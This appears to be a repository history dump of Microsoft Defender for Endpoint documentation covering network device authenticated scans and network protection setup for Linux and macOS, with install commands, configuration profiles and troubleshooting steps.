-> Both the account the user signs in with and the device being used to complete the sign in process, must be in the same tenant where the device is onboarded to Microsoft Defender for Endpoint.
-
-To complete the scanner registration process:
-
-1. Copy and follow the URL that appears on the command line and use the provided installation code to complete the registration process.
-
- > [!NOTE]
- > You may need to change Command Prompt settings to be able to copy the URL.
-
-2. Enter the code and sign in using a Microsoft account that has the Defender for Endpoint permission called "Manage security settings in Defender."
-
-3. When finished, you should see a message confirming you've signed in.
-
-### Updates for scanner
-
-The scanner has a scheduled task that, by default, is configured to look for updates regularly. When the task runs, it compares the version of the scanner on the client device to the version of the agent on the update location. The update location is where Windows looks for updates, such as on a network share or from the internet.
-
-If there's a difference between the two versions, the update process determines which files are different and need to be updated on the local computer. Once the required updates are determined, the downloading of the updates start.
-
-## Configure a new network device authenticated scan
-
-1. Go to **Settings** \> **Device discovery** \> **Authenticated scans** in the [Microsoft Defender portal](https://security.microsoft.com).
-
-2. Select **Add new scan** and choose **Network device authenticated scan** and select **Next**.
-
- :::image type="content" source="../../media/defender-endpoint/network-authenticated-scan.png" alt-text="Screenshot of the add new network device authenticated scan screen" lightbox="../../media/defender-endpoint/network-authenticated-scan.png":::
-
-3. Choose whether to **Activate scan**.
-
-4. Enter a **Scan name**.
-
-5. Select the **Scanning device:** The onboarded device you use to scan the network devices.
-
-6. Enter the **Target (range):** The IP address ranges or hostnames you want to scan. You can either enter the addresses or import a CSV file. Importing a file overrides any manually added addresses.
-
-7. Select the **Scan interval:** By default, the scan runs every four hours, you can change the scan interval or have it only run once, by selecting **Don't repeat**.
-
-8. Choose your **Authentication method**.
-
- You can select to **Use azure KeyVault for providing credentials:** If you manage your credentials in Azure KeyVault, you can enter the Azure KeyVault URL and Azure KeyVault secret name to be accessed by the scanning device to provide credentials. The secret value is dependent on the Authenticated Method you choose, as described in the following table:
-
- |Authentication Method|Azure KeyVault secret value|
- |:-|:-:|
- |AuthPriv|Username;AuthPassword;PrivPassword|
- |AuthNoPriv|Username;AuthPassword|
- |CommunityString |CommunityString|
-
-9. Select **Next** to run or skip the test scan.
-
-10. Select **Next** to review the settings and the select **Submit** to create your new network device authenticated scan.
-
-> [!NOTE]
-> To prevent device duplication in the network device inventory, make sure each IP address is configured only once across multiple scanning devices.
-
-### Scan and add network devices
-
-During the set-up process, you can perform a one time test scan to verify that:
--- There's connectivity between the Defender for Endpoint scanning device and the configured target network devices.-- The configured SNMP credentials are correct.-
-Each scanning device can support up to 1,500 successful IP addresses scan. For example, if you scan 10 different subnets where only 100 IP addresses return successful results, you'll be able to scan 1,400 IP additional addresses from other subnets on the same scanning device.
-
-If there are multiple IP address ranges/subnets to scan, the test scan results take several minutes to show up. A test scan is available for up to 1,024 addresses.
-
-Once the results show up, you can choose which devices will be included in the periodic scan. If you skip viewing the scan results, all configured IP addresses are added to the network device authenticated scan (regardless of the device's response). The scan results can also be exported.
-
-## Device inventory
-
-Newly discovered devices are shown under the new **Network devices** tab in the **Device inventory** page. It may take up to two hours after adding a scanning job until the devices are updated.
--
-## Troubleshooting
-
-### Scanner installation has failed
-
-Verify that the required URLs are added to the allowed domains in your firewall settings. Also, make sure proxy settings are configured as described in [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md).
-
-### The Microsoft.com/devicelogin web page did not show up
-
-Verify that the required URLs are added to the allowed domains in your firewall. Also, make sure proxy settings are configured as described in [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md).
-
-### Network devices are not shown in the device inventory after several hours
-
-The scan results should be updated a few hours after the initial scan that took place after completing the network device authenticated scan configuration.
-
-If devices are still not shown, verify that the service 'MdatpNetworkScanService' is running on your devices being scanned, on which you installed the scanner, and perform a "Run scan" in the relevant network device authenticated scan configuration.
-
-If you still don't get results after 5 minutes, restart the service.
-
-### Devices last seen time is longer than 24 hours
-
-Validate that the scanner is running properly. Then go to the scan definition and select "Run test." Check what error messages are returning from the relevant IP addresses.
-
-### My scanner is configured but scans aren't running
-
-As the authenticated scanner currently uses an encryption algorithm that isn't compliant with [Federal Information Processing Standards (FIPS)](/windows/security/threat-protection/security-policy-settings/system-cryptography-use-fips-compliant-algorithms-for-encryption-hashing-and-signing/), the scanner can't operate when an organization enforces the use of FIPS compliant algorithms.
-
-To allow algorithms that aren't compliant with FIPS, set the following value in the registry for the devices where the scanner will run:
-
-Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy with a DWORD value named **Enabled** and value of **0x0**
-
-FIPS compliant algorithms are only used in relation to departments and agencies of the United States federal government.
-
-### Required Defender Vulnerability Management user permission
-
-Registration finished with an error: "It looks like you don't have sufficient permissions for adding a new agent. The required permission is 'Manage security settings in Defender'."
-
-Press any key to exit.
-
-Ask your system administrator to assign you the required permissions. Alternately, ask another relevant member to help you with the sign-in process by providing them with the sign-in code and link.
-
-### Registration process fails using provided link in the command line in registration process
-
-Try a different browser or copy the sign-in link and code to a different device.
-
-### Text too small or can't copy text from command line
-
-Change command-line settings on your device to allow copying and change text size.
-
-## Related articles
--- [Device inventory](machines-view-overview.md)-- [Windows authenticated scan](../defender-vulnerability-management/windows-authenticated-scan.md)-
security Network Protection Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection-linux.md
- Title: Use network protection to help prevent Linux connections to bad sites
-description: Protect your network by preventing Linux users from accessing known malicious and suspicious network addresses
--------- m365-security-- tier2-- mde-linux Previously updated : 02/17/2023--
-# Network protection for Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Overview
-
-Microsoft is bringing Network Protection functionality to Linux.
-
-Network protection helps reduce the attack surface of your devices from Internet-based events. It prevents employees from using any application to access dangerous domains that may host:
--- phishing scams-- exploits-- other malicious content on the Internet-
-Network protection expands the scope of Microsoft Defender [SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) to block all outbound HTTP(s) traffic that attempts to connect to low-reputation sources. The blocks on outbound HTTP(s) traffic are based on the domain or hostname.
-
-## Web content filtering for Linux
-
-You can use web content filtering for testing with Network protection for Linux. See [Web content filtering](web-content-filtering.md).
-
-### Known issues
--- Network Protection is implemented as a virtual private network (VPN) tunnel. Advanced packet routing options using custom nftables/iptables scripts are available.-- Block/Warn UX isn't available
- - Customer feedback is being collected to drive further design improvements
-
-> [!NOTE]
-> To evaluate the effectiveness of Linux Web Threat Protection, we recommend using the Firefox browser which is the default for all the distributions.
-
-### Prerequisites
--- Licensing: Microsoft Defender for Endpoint tenant (can be trial) and platform specific requirements found in [Microsoft Defender for Endpoint for non-Windows platforms](non-windows.md#licensing-requirements)-- Onboarded Machines:
- - **Minimum Linux version**: For a list of supported distributions, see [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md).
- - **Microsoft Defender for Endpoint Linux client version**: 101.78.13 -insiderFast(Preview)
-
-## Instructions
-
-Deploy Linux manually, see [Deploy Microsoft Defender for Endpoint on Linux manually](linux-install-manually.md)
-
-The following example shows the sequence of commands needed to the mdatp package on ubuntu 20.04 for insiders-Fast channel.
-
-```bash
-curl -o microsoft.list https://packages.microsoft.com/config/ubuntu/20.04/insiders-fast.list
-sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-insiders-fast.list
-sudo apt-get install gpg
-curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
-sudo apt-get install apt-transport-https
-sudo apt-get update
-sudo apt install -y mdatp
-```
-
-### Device Onboarding
-
-To onboard the device, you must download the Python onboarding package for Linux server from Microsoft Defender XDR -> Settings -> Device Management -> Onboarding and run:
-
-```bash
-sudo python3 MicrosoftDefenderATPOnboardingLinuxServer.py
-```
-
-### Validation
-
-1. Check Network Protection has effect on always blocked sites:
- - <http://smartscreentestratings2.net>
- - <https://smartscreentestratings2.net>
-
- <!--These links are purposely blocked; will trigger as broken link>
-
-2. Inspect diagnostic logs
-
- ```bash
- sudo mdatp log level set --level debug
- sudo tail -f /var/log/microsoft/mdatp/microsoft_defender_np_ext.log
- ```
-
-#### To exit the validation mode
-
-Disable network protection and restart the network connection:
-
-```bash
-sudo mdatp config network-protection enforcement-level --value disabled
-```
-
-## Advanced configuration
-
-By default, Linux network protection is active on the default gateway; routing and tunneling are internally configured.
-To customize the network interfaces, change the **networkSetupMode** parameter from the **/opt/microsoft/mdatp/conf/** configuration file and restart the service:
-
-```bash
-sudo systemctl restart mdatp
-```
-
-The configuration file also enables the user to customize:
--- proxy setting-- SSL certificate stores-- tunneling device name-- IP-- and more-
-The default values were tested for all distributions as described in [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-
-### Microsoft Defender portal
-
-Also, make sure that in **Microsoft Defender** \> **Settings** \> **Endpoints** \> **Advanced features** that **'Custom network indicators'** toggle is set _enabled_.
-
-> [!IMPORTANT]
-> The above **'Custom network indicators'** toggle controls **Custom Indicators** enablement **for ALL platforms** with Network Protection support, including Windows. Reminder thatΓÇöon WindowsΓÇöfor indicators to be enforced you also must have Network Protection explicitly enabled.
--
-## How to explore the features
-
-1. Learn how to [Protect your organization against web threats](web-threat-protection.md) using web threat protection.
- - Web threat protection is part of web protection in Microsoft Defender for Endpoint. It uses network protection to secure your devices against web threats.
-2. Run through the [Custom Indicators of Compromise](indicator-ip-domain.md) flow to get blocks on the Custom Indicator type.
-3. Explore [Web content filtering](web-content-filtering.md).
-
- > [!NOTE]
- > If you are removing a policy or changing device groups at the same time, this might cause a delay in policy deployment.
- > Pro tip: You can deploy a policy without selecting any category on a device group. This action will create an audit only policy, to help you understand user behavior before creating a block policy.
- >
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-4. [Integrate Microsoft Defender for Endpoint with Defender for Cloud Apps](/defender-cloud-apps/mde-integration) and your network protection-enabled macOS devices will have endpoint policy enforcement capabilities.
-
- > [!NOTE]
- > Discovery and other features are currently not supported on these platforms.
-
-## Scenarios
-
-The following scenarios are supported during public preview:
-
-### Web threat protection
-
-Web threat protection is part of Web protection in Microsoft Defender for Endpoint. It uses network protection to secure your devices against web threats. By integrating with Microsoft Edge and popular third-party browsers like Chrome and Firefox, web threat protection stops web threats without a web proxy. Web threat protection can protect devices while they're on premises or away. Web threat protection stops access to the following types of sites:
--- phishing sites-- malware vectors-- exploit sites-- untrusted or low-reputation sites-- sites you've blocked in your custom indicator list-
->:::image type="content" source="media/network-protection-reports-web-protection.png" alt-text="Web Protection reports web threat detections." lightbox="media/network-protection-reports-web-protection.png":::
-
-For more information, see [Protect your organization against web threat](web-threat-protection.md)
-
-#### Custom Indicators of Compromise
-
-Indicator of compromise (IoCs) matching is an essential feature in every endpoint protection solution. This capability gives SecOps the ability to set a list of indicators for detection and for blocking (prevention and response).
-
-Create indicators that define the detection, prevention, and exclusion of entities. You can define the action to be taken as well as the duration for when to apply the action and the scope of the device group to apply it to.
-
-Currently supported sources are the cloud detection engine of Defender for Endpoint, the automated investigation and remediation engine, and the endpoint prevention engine (Microsoft Defender Antivirus).
--
-For more information, see: [Create indicators for IPs and URLs/domains](indicator-ip-domain.md).
-
-### Web content filtering
-
-Web content filtering is part of the [Web protection](web-protection-overview.md) capabilities in Microsoft Defender for Endpoint and Microsoft Defender for Business. Web content filtering enables your organization to track and regulate access to websites based on their content categories. Many of these websites (even if they're not malicious) might be problematic because of compliance regulations, bandwidth usage, or other concerns.
-
-Configure policies across your device groups to block certain categories. Blocking a category prevents users within specified device groups from accessing URLs associated with the category. For any category that's not blocked, the URLs are automatically audited. Your users can access the URLs without disruption, and you'll gather access statistics to help create a more custom policy decision. Your users will see a block notification if an element on the page they're viewing is making calls to a blocked resource.
-
-Web content filtering is available on the major web browsers, with blocks performed by Windows Defender SmartScreen (Microsoft Edge) and Network Protection (Chrome, Firefox, Brave, and Opera). For more information about browser support, see [Prerequisites](#prerequisites).
--
-For more information about reporting, see [Web content filtering](web-content-filtering.md).
-
-### Microsoft Defender for Cloud Apps
-
-The Microsoft Defender for Cloud Apps / Cloud App Catalog identifies apps you would want end users to be warned upon accessing with Microsoft Defender XDR for Endpoint, and mark them as _Monitored_. The domains listed under monitored apps would be later synced to Microsoft Defender XDR for Endpoint:
--
-Within 10-15 minutes, these domains will be listed in Microsoft Defender XDR under Indicators > URLs/Domains with Action=Warn. Within the enforcement SLA (see details at the end of this article).
--
-## See also
--- [Protect your network](network-protection.md)-- [Turn on network protection](enable-network-protection.md)-- [Web protection](web-protection-overview.md)-- [Create indicators](manage-indicators.md)-- [Web content filtering](web-content-filtering.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-
security Network Protection Macos https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection-macos.md
- Title: Use network protection to help prevent macOS connections to bad sites
-description: Protect your network by preventing macOS users from accessing known malicious and suspicious network addresses
- Previously updated : 12/08/2023---------- m365-security-- tier2-- mde-macos--
-# Network protection for macOS
--
-**Applies to:**
--- [Microsoft Microsoft Defender XDR for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Microsoft Defender XDR for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-## Overview
-
-Microsoft Network protection helps reduce the attack surface of your devices from Internet-based events. It prevents employees from using any application to access dangerous domains that might host:
--- phishing scams-- exploits-- other malicious content on the Internet-
-Network protection expands the scope of Microsoft Defender XDR [SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) to block all outbound HTTP(s) traffic that attempts to connect to low-reputation sources. The blocks on outbound HTTP(s) traffic are based on the domain or hostname.
-
-## Availability
-
-Network Protection for macOS is now available for all Microsoft Defender for Endpoint onboarded macOS devices that meet the minimum requirements. All of your currently configured Network Protection and Web Threat Protection policies are enforced on macOS devices where Network Protection is configured for block mode.
-
-To roll out Network Protection for macOS, we recommend the following actions:
--- Create a device group for a small set of devices that you can use to test Network Protection.-- Evaluate the impact of Web Threat Protection, Custom Indicators of Compromise, Web Content Filtering, and Microsoft Defender for Cloud Apps enforcement policies that target those macOS devices where Network Protection is in Block mode.-- Deploy an audit or block mode policy to this device group and verify there are no issues or broken workstreams.-- Gradually deploy Network Protection to a larger set of devices until rolled out.-
-## Current capabilities
--- Custom Indicators of Compromise on Domains and IPs.-- Web Content Filtering support:
- - Block website categories scoped to device groups through policies created in the Microsoft Defender portal.
- - Policies are applied to browsers, including Chromium Microsoft Edge for macOS.
-- Advanced Hunting - Network Events are reflected in the Machine Timeline, and queryable in Advanced Hunting to aid security investigations.-- Microsoft Defender for Cloud Apps:
- - Shadow IT discovery - Identify which apps are being used in your organization.
- - Block applications - Block entire applications (such as Slack and Facebook) from being used in your organization.
-- Corporate VPN in tandem or side-by-side with Network Protection:
- - Currently, no VPN conflicts are identified.
- - If you do experience conflicts, you can provide feedback through the feedback channel listed at the bottom of this page.
-
-### Known issues
--- Block/Warn UX isn't customizable and might require other look and feel changes. (Customer feedback is being collected to drive further design improvements)-- There's a known application incompatibility issue with VMware's "Per-App Tunnel" feature. (This incompatibility might result in an inability to block traffic that goes through the "Per-App Tunnel.")-- There's a known application incompatibility issue with Blue Coat Proxy. (This incompatibility might result in network layer crashes in unrelated applications when both Blue Coat Proxy and Network Protection are enabled.)-
-### Important notes
--- We don't recommend controlling network protection from System Preferences by using the Disconnect button. Instead, use the mdatp command-line tool or JAMF / Intune to control network protection for macOS.-- To evaluate effectiveness of macOS web threat protection, we recommend trying it in browsers other than Microsoft Edge for macOS (for example, Safari). Microsoft Edge for macOS has built-in web threat protection that is enabled regardless of whether the Mac network protection feature you're evaluating, is turned on or not.-
-> [!NOTE]
->
-> Microsoft Edge for macOS does not currently support web content filtering, custom indicators, or other enterprise features. However, network protection will provide this protection to Microsoft Edge for macOS if network protection is enabled.
-
-## Prerequisites
--- Licensing: Microsoft Defender XDR for Endpoint Plan 1 or Microsoft Defender XDR for Endpoint Plan 2 (can be trial)-- Onboarded Machines:
- - Minimum macOS version: 11
- - Product version 101.94.13 or later
-
-## Deployment instructions
-
-<a name='microsoft-365-defender-for-endpoint'></a>
-
-### Microsoft Defender XDR for Endpoint
-
-Install the most recent product version through Microsoft AutoUpdate. To open Microsoft AutoUpdate, run the following command from the Terminal:
-
-```bash
-open /Library/Application\ Support/Microsoft/MAU2.0/Microsoft\ AutoUpdate.app
-```
-
-Configure the product with your organization information using the instructions in our public documentation.
-
-Network protection is disabled by default, but it can be configured to run in one of the following modes (also called enforcement levels):
--- **Audit**: useful to make sure it doesn't affect line-of-business apps, or get an idea of how often blocks occur-- **Block**: network protection prevents connection to malicious websites-- **Disabled**: all components associated with network protection are disabled-
-You can deploy this feature in one of the following ways: manually, through JAMF, or through Intune. The following sections describe each of these methods in detail.
-
-#### Manual deployment
-
-To configure the enforcement level, run the following command from the Terminal:
-
-```bash
-mdatp config network-protection enforcement-level --value [enforcement-level]
-```
-
-For example, to configure network protection to run in blocking mode, execute the following command:
-
-```bash
-mdatp config network-protection enforcement-level --value block
-```
-
-To confirm that network protection has been started successfully, run the following command from the Terminal, and verify that it prints "started":
-
-```bash
-mdatp health --field network_protection_status
-```
-
-#### JAMF deployment
-
-A successful JAMF deployment requires a configuration profile to set the enforcement level of network protection.
-After you create this configuration profile, assign it to the devices where you want to enable network protection.
-
-##### Configure the enforcement level
-
-Note: If you've already configured Microsoft Defender XDR for Endpoint on Mac using the instructions listed here, then update the plist file you previously deployed with the content listed below and redeploy it from JAMF.
-
-1. In **Computers** \> **Configuration Profiles**, select **Options** \> **Applications & Custom Settings**
-2. Select **Upload File** (PLIST file)
-3. Set preference domain to _com.microsoft.wdav_
-4. Upload the following plist file
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>networkProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- </dict>
-</dict>
-</plist>
-```
-
-#### Intune deployment
-
-A successful Intune deployment requires a configuration profile to set the enforcement level of network protection.
-After you create this configuration profile, assign it to the devices where you want to enable network protection.
-
-##### Configure the enforcement level using Intune
-
-> [!NOTE]
-> If you've already configured Microsoft Defender for Endpoint on Mac using the previous instructions (with an XML file), then remove the previous Custom configuration policy and replace it with the instructions below.
-
-1. Open **Manage** \> **Device configuration**. Select **Manage** \> **Profiles** \> **Create Profile**.
-2. Change **Platform** to **macOS** and **Profile type** to **Settings catalog**. Select **Create**.
-3. Specify a name for the profile.
-4. On the **Configuration settings** screen, select **Add settings**. Select **Microsoft Defender** \> **Network protection**, and tick the **Enforcement level** checkbox.
-5. Set the enforcement level to **block**. Select **Next**
-6. Open the configuration profile and upload the com.microsoft.wdav.xml file. (This file was created in step 3.)
-7. Select **OK**
-8. Select **Manage** \> **Assignments**. In the **Include** tab, select the devices for which you want to enable network protection.
-
-#### Mobileconfig deployment
-
-To deploy the configuration via a .mobileconfig file, which can be used with non-Microsoft MDM solutions or distributed to devices directly:
-
-1. Save the following payload as _com.microsoft.wdav.xml.mobileconfig_
-
- ```xml
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
- <plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender ATP settings</string>
- <key>PayloadDescription</key>
- <string>Microsoft Defender ATP configuration settings</string>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
- <key>PayloadType</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender ATP configuration settings</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>networkProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- </dict>
- </dict>
- </array>
- </dict>
- </plist>
- ```
-
-2. Verify that the above file was copied correctly. From the Terminal, run the following command and verify that it outputs OK:
-
- ```bash
- plutil -lint com.microsoft.wdav.xml
- ```
--
-## How to explore the features
-
-1. Learn how to [Protect your organization against web threats](web-threat-protection.md) using web threat protection.
- - Web threat protection is part of web protection in Microsoft Defender for Endpoint. It uses network protection to secure your devices against web threats.
-2. Run through the [Custom Indicators of Compromise](indicator-ip-domain.md) flow to get blocks on the Custom Indicator type.
-3. Explore [Web content filtering](web-content-filtering.md).
- > [!NOTE]
- > If you are removing a policy or changing device groups at the same time, this might cause a delay in policy deployment.
- > Pro tip: You can deploy a policy without selecting any category on a device group. This action will create an audit only policy, to help you understand user behavior before creating a block policy.
- >
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-4. [Integrate Microsoft Defender for Endpoint with Defender for Cloud Apps](/defender-cloud-apps/mde-integration) and your network protection-enabled macOS devices have endpoint policy enforcement capabilities.
- > [!NOTE]
- > Discovery and other features are currently not supported on these platforms.
-
-## Scenarios
-
-The following scenarios are supported.
-
-### Web threat protection
-
-Web threat protection is part of web protection in Microsoft Defender XDR for Endpoint. It uses network protection to secure your devices against web threats. By integrating with Microsoft Edge for macOS and popular non-Microsoft browsers, such as Chrome and Firefox, web threat protection stops web threats without a web proxy. Web threat protection can protect devices while they're on premises or away. Web threat protection stops access to the following types of sites:
--- phishing sites-- malware vectors-- exploit sites-- untrusted or low-reputation sites-- sites that are blocked in your custom indicator list--
-For more information, see [Protect your organization against web threat](web-threat-protection.md)
-
-### Custom Indicators of Compromise
-
-Indicator of compromise (IoCs) matching is an essential feature in every endpoint protection solution. This capability gives SecOps the ability to set a list of indicators for detection and for blocking (prevention and response).
-
-Create indicators that define the detection, prevention, and exclusion of entities. You can define the action to be taken as well as the duration for when to apply the action and the scope of the device group to apply it to.
-
-Currently supported sources are the cloud detection engine of Defender for Endpoint, the automated investigation and remediation engine, and the endpoint prevention engine (Microsoft Defender Antivirus).
--
-For more information, see: [Create indicators for IPs and URLs/domains](indicator-ip-domain.md).
-
-### Web content filtering
-
-Web content filtering is part of the [Web protection](web-protection-overview.md) capabilities in Microsoft Defender for Endpoint and Microsoft Defender for Business. Web content filtering enables your organization to track and regulate access to websites based on their content categories. Many of these websites (even if they're not malicious) might be problematic because of compliance regulations, bandwidth usage, or other concerns.
-
-Configure policies across your device groups to block certain categories. Blocking a category prevents users within specified device groups from accessing URLs associated with the category. For any category that's not blocked, the URLs are automatically audited. Your users can access the URLs without disruption, and you gather access statistics to help create a more custom policy decision. Your users see a block notification if an element on the page they're viewing is making calls to a blocked resource.
-
-Web content filtering is available on the major web browsers, with blocks performed by Network Protection (Safari, Chrome, Firefox, Brave, and Opera). For more information about browser support, see [Prerequisites](#prerequisites).
--
-For more information about reporting, see [Web content filtering](web-content-filtering.md).
-
-### Microsoft Defender for Cloud Apps
-
-The Microsoft Defender for Cloud Apps / Cloud App Catalog identifies apps you would want end users to be warned upon accessing with Microsoft Defender XDR for Endpoint, and mark them as _Monitored_. The domains listed under monitored apps would be later synced to Microsoft Defender XDR for Endpoint:
--
-Within 10-15 minutes, these domains are listed in Microsoft Defender XDR under Indicators > URLs/Domains with Action=Warn. Within the enforcement SLA (see details at the end of this article), end users are getting warn messages when attempting to access these domains:
--
-When the end user is attempting to access monitored domains, they're warned by Defender for Endpoint.
--- The user gets a plain block experience accompanied by the following toast message, which is displayed by the operating system including the name of the blocked application (e.g Blogger.com)-
- :::image type="content" source="media/network-protection-macos-content-blocked.png" alt-text="Shows end-user network protection content blocked toast notification.":::
-
-If the end user encounters a _block_, the user has two possible resolutions:
-
-#### User bypass
--- **For toast message experience**: Press the Unblock button. By reloading the webpage, the user is able to proceed and use the cloud app. (This action is applicable for the next 24 hours, after which the user has to unblock once again)-
-#### User education
--- **For toast message experience**: Press the toast message itself. End user is redirected to a custom redirect URL set globally in Microsoft Defender for Cloud Apps (More information at the bottom of this page)-
-> [!NOTE]
-> Tracking bypasses per app** ΓÇô You can track how many users have bypassed the warning in the _Application_ page in Microsoft Defender for Cloud Apps.
-
- :::image type="content" source="media/network-protection-macos-mcas-cloud-app-security.png" alt-text="Shows network protection cloud app security overview.":::
-
-## Appendix
-
-### End user education center SharePoint site template
-
-For many organizations, it's important to take the cloud controls provided by Microsoft Defender for Cloud Apps, and to not only set limitations on end users when needed, but to also educate and coach them about:
--- the specific incident-- why it has happened-- what is the thinking behind this decision-- how encountering block sites can be mitigated-
-Upon facing an unexpected behavior, users' confusion might be reduced by providing them as much information as possible, not only to explain about what has happened but to also educate them to be more aware the next time they choose a cloud app to complete their job. For example, this information can include:
--- Organization security and compliance policies and guidelines for internet and cloud use-- Approved/recommended cloud apps for use-- Restricted/blocked cloud apps for use-
-For this page, we recommend that your organization uses a basic SharePoint site.
-
-### Important things to know
-
-1. It can take up to two hours (typically less) for app domains to propagate and to be update in the endpoint devices, after it's marked as _Monitored_.
-2. By default, action is taken for all apps and domains that were marked as Monitored in Microsoft Defender for Cloud Apps portal for all the onboarded endpoints in the organization.
-3. Full URLs are currently not supported and won't be sent from Microsoft Defender for Cloud Apps to Microsoft Defender XDR for Endpoint, if any full URLs are listed under Microsoft Defender for Cloud Apps monitored apps, hence, user won't get warned on access attempt (for example, google.com/drive isn't supported, while drive.google.com is supported).
-
-No End-user notification on third party browsers? Check your toast message settings.
-
-## See also
--- [Microsoft Defender XDR for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender XDR for Endpoint integration with Microsoft Microsoft Defender XDR for Cloud Apps](/defender-cloud-apps/mde-integration)-- [Get to know the innovative features in Microsoft Edge](https://www.microsoft.com/edge/features)-- [Protect your network](network-protection.md)-- [Turn on network protection](enable-network-protection.md)-- [Web protection](web-protection-overview.md)-- [Create indicators](manage-indicators.md)-- [Web content filtering](web-content-filtering.md)--
security Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-protection.md
- Title: Use network protection to help prevent connections to bad sites
-description: Protect your network by preventing users from accessing known malicious and suspicious network addresses
- Previously updated : 02/28/2024---------- m365-security-- tier2-- mde-asr--
-# Protect your network
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- macOS-- Linux-
-Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink).
-
-## Overview of network protection
-
-Network protection helps protect devices from Internet-based events. Network protection is an attack surface reduction capability. It helps prevent employees from accessing dangerous domains through applications. Domains that host phishing scams, exploits, and other malicious content on the Internet are considered dangerous. Network protection expands the scope of [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) to block all outbound HTTP(S) traffic that attempts to connect to low-reputation sources (based on the domain or hostname).
-
-Network protection extends the protection in [Web protection](web-protection-overview.md) to the operating system level, and is a core component for Web Content Filtering (WCF). It provides the web protection functionality found in Microsoft Edge to other supported browsers and non-browser applications. Network protection also provides visibility and blocking of indicators of compromise (IOCs) when used with [Endpoint detection and response](overview-endpoint-detection-response.md). For example, network protection works with your [custom indicators](manage-indicators.md) that you can use to block specific domains or host names.
-
-### Network protection coverage
-
-The following table summarizes network protection areas of coverage.
-
-| Feature | Microsoft Edge | 3rd-party browsers | Non-browser processes <br> (e.g. PowerShell) |
-|:|:|:|:|
-| Web Threat Protection | SmartScreen must be enabled | Network protection must be in block mode | Network protection must be in block mode |
-| Custom Indicators | SmartScreen must be enabled | Network protection must be in block mode | Network protection must be in block mode |
-| Web Content Filtering | SmartScreen must be enabled | Network protection must be in block mode | Not supported |
-
-> [!NOTE]
-> On Mac and Linux, you must have network protection in block mode to get support for these features in Edge.
-> On Windows, network protection does not monitor Microsoft Edge. For processes other than Microsoft Edge and Internet Explorer, web protection scenarios leverage network protection for inspection and enforcement.
-> - IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS)).
-> - Only single IP addresses are supported (no CIDR blocks or IP ranges) in custom indicators.
-> - Encrypted URLs (full path) can only be blocked on first party browsers (Internet Explorer, Edge).
